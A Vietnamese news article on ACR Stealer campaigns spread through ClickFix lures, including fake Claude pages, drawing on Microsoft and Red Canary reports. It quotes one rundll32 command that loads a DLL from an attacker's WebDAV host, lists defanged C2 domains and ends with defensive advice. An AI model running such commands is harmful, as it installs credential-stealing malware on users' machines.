ACR Stealer, một loại mã độc đánh cắp thông tin (infostealer) lưu hành từ năm 2024, đang âm thầm xâm nhập các mạng doanh nghiệp để lấy đi mật khẩu trình duyệt đã lưu, token phiên đăng nhập (live session tokens), tệp PDF, tài liệu Microsoft 365 và các tệp tin từ các thư mục OneDrive và SharePoint đã được đồng bộ hóa.
Mã độc này xâm nhập thành công nhờ việc người dùng dán một đoạn mã vào hộp thoại Run và nhấn Enter. Vào hôm thứ Năm, Microsoft đã công bố hai chuỗi phân phối của loại mã độc này. Đội ngũ Defender Experts, bộ phận phát hiện và phản ứng được quản lý của Microsoft, đã quan sát thấy hoạt động của ACR Stealer gia tăng trong môi trường khách hàng từ cuối tháng 4 đến giữa tháng 6. Họ cho biết các chiến dịch này đang "sử dụng thành công mồi nhử ClickFix để đánh cắp thông tin đăng nhập trình duyệt, token xác thực và các tài liệu nhạy cảm."
Cả hai chuỗi tấn công đều bắt đầu bằng cùng một lời nhắc (prompt), sau đó phân tách: một chuỗi để lại dấu vết trên ổ đĩa, chuỗi còn lại chạy gần như hoàn toàn trên bộ nhớ (fileless). Microsoft khuyến nghị các nạn nhân nên thu hồi các token chứ không chỉ đơn giản là đổi mật khẩu.
Payload ẩn trong các điểm ảnh
Báo cáo cho biết lời nhắc này thường xuất hiện thông qua quảng cáo độc hại (malvertising) hoặc kết quả tìm kiếm bị thao túng SEO. Chuỗi tấn công fileless bắt đầu khi lệnh được dán vào sẽ kích hoạt mshta.exe để tải nội dung HTA từ xa. Một trình nạp VBScript được nhúng sẵn dựa vào các COM objects để giải mã và kích hoạt PowerShell; giai đoạn này sẽ tạo ra một ID nạn nhân, vô hiệu hóa việc kiểm tra chứng chỉ và thực thi những gì nó tải về trực tiếp trên bộ nhớ.
Thứ mà nó tải về là một tệp JPEG từ một dịch vụ lưu trữ hình ảnh, với payload nằm ẩn bên trong các điểm ảnh (steganography). Các quy trình tùy chỉnh sẽ tách payload ra, giải mã, giải nén và thực thi nó theo phương thức reflective. Sau đó, nó nhắm vào Chrome và Edge, đọc các cơ sở dữ liệu Login Data và Web Data, đồng thời gọi DPAPI để giải mã mật khẩu, cookie và token. Các tệp PDF trên màn hình chính (Desktop) và thư mục Downloads cũng bị lấy đi.
Vào ngày 26 tháng 5, Brad Duncan từ SANS Internet Storm Center đã ghi nhận một trường hợp nhiễm mã độc trên Windows bắt nguồn từ một trang web giả mạo Claude (trợ lý AI của Anthropic). Trang web này được tiếp cận qua quảng cáo Google độc hại và thường ẩn sau các URL sites.google.com. Trang web sẽ cung cấp hướng dẫn cho macOS khi mở trên máy Mac và hướng dẫn cho Windows khi mở trên Windows.
Microsoft không bao giờ nêu đích danh loại mồi nhử. Tuy nhiên, hai chỉ dấu (indicators) trong bảng Chiến dịch 2 của họ là creativecommunityinfo[.]art và enhanceblabber[.]cc được liệt kê là máy chủ chứa payload và C2. The Hacker News đã đối chiếu và thấy cả hai đều khớp với chuỗi tấn công của Duncan.
Chuỗi đó cũng tải một tệp JPEG dung lượng 628 KB từ ImgBB, một dịch vụ lưu trữ ảnh. Duncan đã đánh dấu nó là một phần của quá trình nhiễm độc nhưng ban đầu không tìm thấy dấu hiệu rõ ràng của dữ liệu nhúng bên trong.
Red Canary cũng đã ghi nhận các mồi nhử mang thương hiệu Claude một tháng trước đó, phân phối ACR Stealer thông qua các trang Claude Code giả mạo trên GitLab như claude-desktop[.]gitlab[.]io.
Chuỗi tấn công khác để lại dấu vết
Chuỗi tấn công đầu tiên của Microsoft có ghi dữ liệu lên đĩa, giúp các chuyên gia bảo mật có nhiều manh mối để xử lý hơn. Lệnh được dán vào sẽ tải một tệp DLL trực tiếp từ một WebDAV share qua HTTPS, sử dụng một thư mục GUID và tên tệp được ngụy trang; ví dụ trong báo cáo là google.ct.
Red Canary cũng đã công bố hình thái tương tự trong báo cáo tháng 5 của họ từ dữ liệu đo lường tháng 4:
"C:\Windows\system32\rundll32.exe" \\sphere-api.dialectosphere.in[.]net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1
Hai trong số ba biến thể mà Defender Experts phát hiện đã sử dụng pushd để gắn (mount) ổ chia sẻ từ xa thành một ổ đĩa cục bộ tạm thời, khiến payload chạy qua một đường dẫn trông như thể nằm trên máy. Biến thể tinh vi nhất bao bọc lệnh đó trong conhost.exe --headless để tắt cửa sổ console và ẩn các chuỗi ký tự pushd, rundll32 thông qua kỹ thuật mở rộng biến môi trường (delayed environment-variable expansion).
Tiếp theo là đoạn mã PowerShell đã được làm rối (obfuscated). Nó thả một tệp ZIP vào thư mục %LocalAppData%\Temp với một cái tên vô hại; ví dụ của Microsoft là LogiOptionsPlus. Một tệp pythonw.exe đi kèm sau đó sẽ thực thi đoạn mã Python, do đó không có gì hiển thị trên màn hình. Trình cài đặt sẽ xóa các bản sao cũ trước khi cài đặt mới, đóng vai trò như một bộ cập nhật (updater).
Mã độc duy trì sự hiện diện (persistence) thông qua một tác vụ được lập lịch ẩn (hidden scheduled task) giả mạo là bản cập nhật phần mềm, sao chép mốc thời gian (timestomping) từ notepad.exe sang các tệp của chính nó và xóa lịch sử PowerShell. Giai đoạn cuối cùng nằm lại trong bộ nhớ, chuyển quyền thực thi thông qua Windows Fiber API.
Trong một số trường hợp, trình nạp Python thứ hai sẽ giao tiếp với các RPC endpoint của blockchain công khai và hạ tầng nút Web3, có khả năng để tải payload hoặc địa chỉ C2 từ sổ cái công khai. Microsoft gọi kỹ thuật này là EtherHiding.
Không lỗ hổng, không con số cụ thể
Cả hai chuỗi tấn công đều không khai thác bất kỳ lỗ hổng bảo mật nào. Chúng thừa hưởng đúng quyền hạn mà người dùng đang đăng nhập có. Mọi lớp tiếp theo—từ việc gắn WebDAV, trích xuất điểm ảnh đến thực thi trên bộ nhớ—chỉ chạy vì một người đã đọc lời nhắc và nhấn Enter. Không có mã lỗi CVE nào trong câu chuyện này. Việc cập nhật bản vá (patching) không thể loại bỏ con đường lây nhiễm thông qua hành vi "dán và chạy" của người dùng.
Microsoft cho biết các mồi nhử này đang hoạt động hiệu quả nhưng không đưa ra con số cụ thể về số lượng nạn nhân hay khách hàng bị ảnh hưởng.
Dữ liệu đo lường của Red Canary vào tháng 4 ít nhất có đưa ra các con số. ClearFake, một cụm mã độc chuyên tiêm mã vào web (web-inject) vốn đã phân phối ACR Stealer từ ít nhất tháng 3 năm 2025, đã lần đầu tiên vươn lên vị trí số 1 trong danh sách các mối đe dọa phổ biến nhất vào tháng đó, và ACR Stealer cũng lọt vào top 10.
Mã độc này của ai?
Microsoft rất thận trọng trong các tuyên bố của mình. Họ liên kết hoạt động này với ACR Stealer dựa trên hành vi quan sát được và kỹ thuật sau khi xâm nhập, đối chiếu với những gì đã biết về hạ tầng của dòng mã độc này, và không chỉ đích danh bất kỳ nhóm tin tặc (threat actor) nào.
ACR, còn được gọi là AcridRain, từng được rao bán trên các diễn đàn tiếng Nga bởi một nhân vật có tên SheldIO, người đã thông báo ngừng bán vào tháng 7 năm 2024. Có nhiều thông tin khác nhau về những gì xảy ra sau đó. eSentire cho rằng mã nguồn đã được bán lại. Trong khi đó, Proofpoint báo cáo vào tháng 6 năm 2025 rằng ACR Stealer đã được cập nhật đáng kể và đổi tên thành Amatera Stealer, với giá từ 199 USD/tháng đến 1.499 USD/năm. Red Canary coi ACR và Amatera là cùng một dòng và đánh giá bản thân ACR là một phiên bản cập nhật của GrMsk Stealer.
Cách ngăn chặn
Có một biện pháp kiểm soát quan trọng có thể ngăn chặn mọi kỹ thuật trên: cả hai chuỗi tấn công đều không thể chạy nếu người dùng không dán lệnh vào hộp thoại Run.
- Loại bỏ vector tấn công: eSentire khuyến nghị gỡ bỏ hộp thoại Run thông qua GPO và chặn
mshta.exebằng AppLocker hoặc WDAC. - Sử dụng các quy tắc kiểm soát ứng dụng và giảm thiểu bề mặt tấn công (ASR rules) để PowerShell, Python,
mshta.exevàrundll32.exekhông thể khởi chạy nội dung tải về từ internet từ các thư mụcDownloads,Temphoặc%LocalAppData%. - Săn tìm (hunting)
rundll32.exechạy mà không có tham số dòng lệnh trong khi đang thực hiện kết nối mạng. Theo dõi các tác vụ lập lịch giả mạo bản cập nhật phần mềm, hành vi sửa đổi mốc thời gian tệp (timestomping) và xóa lịch sử PowerShell. - Trên một máy tính nghi ngờ bị nhiễm: cô lập máy, thay đổi thông tin đăng nhập, thu hồi token và kiểm tra các kết nối ra bên ngoài tới các ổ chia sẻ từ xa và dịch vụ lưu trữ hình ảnh.